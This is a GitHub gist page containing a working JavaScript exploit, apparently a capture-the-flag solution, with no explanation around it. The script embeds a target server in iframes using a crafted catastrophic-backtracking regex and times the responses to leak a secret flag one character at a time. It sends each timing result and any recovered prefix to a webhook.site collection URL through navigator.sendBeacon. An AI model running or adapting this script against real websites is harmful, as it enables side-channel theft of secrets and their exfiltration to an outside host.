-
-
Save terjanq/60b4ae4ce7491a0f3104e62e2ab07c87 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body> | |
| </body> | |
| <script> | |
| const URL = 'http://webhook.site/c53594fb-68a5-4db1-a20e-cf802a37156a' | |
| const sleep = d => new Promise(r => setTimeout(r, d)); | |
| function test_prefix(P) { | |
| return new Promise(resolve => { | |
| let x = document.createElement('iframe'); | |
| let src = `http://34.84.161.130:18364/?^(?=${P})((((.*)*)*)*)*!$#${URL}?img=${P}` | |
| x.src = src | |
| document.body.appendChild(x); | |
| let start2 = performance.now(); | |
| x.onload = async () => { | |
| let start = performance.now(); | |
| await sleep(2000); | |
| let i2 = document.createElement('iframe'); | |
| i2.src = 'http://34.84.161.130:18364' | |
| i2.onload = () => { | |
| resolve(performance.now() - start); | |
| x.remove() | |
| i2.remove(); | |
| } | |
| document.body.appendChild(i2); | |
| } | |
| }) | |
| } | |
| let prefix = ""; | |
| (async function () { | |
| const alphabet = "_ABCSDEFGHIJKLMNOPQRSTUVWXYZ0123456789" | |
| const initial = await test_prefix("DUMMY" + Math.random()); | |
| console.log('initial time', initial); | |
| navigator.sendBeacon(`${URL}?initial=${initial}`); | |
| // while (1) { | |
| for (let c of alphabet) { | |
| let flag = prefix + c; | |
| let x = await test_prefix(flag) | |
| navigator.sendBeacon(`${URL}?p=${flag}&t=${Math.floor(x)}`) | |
| console.log('try', flag, x) | |
| if (x > 2 * initial) { | |
| navigator.sendBeacon(`${URL}?flag=${flag}`) | |
| prefix = flag; | |
| break; | |
| } | |
| } | |
| // } | |
| })() | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment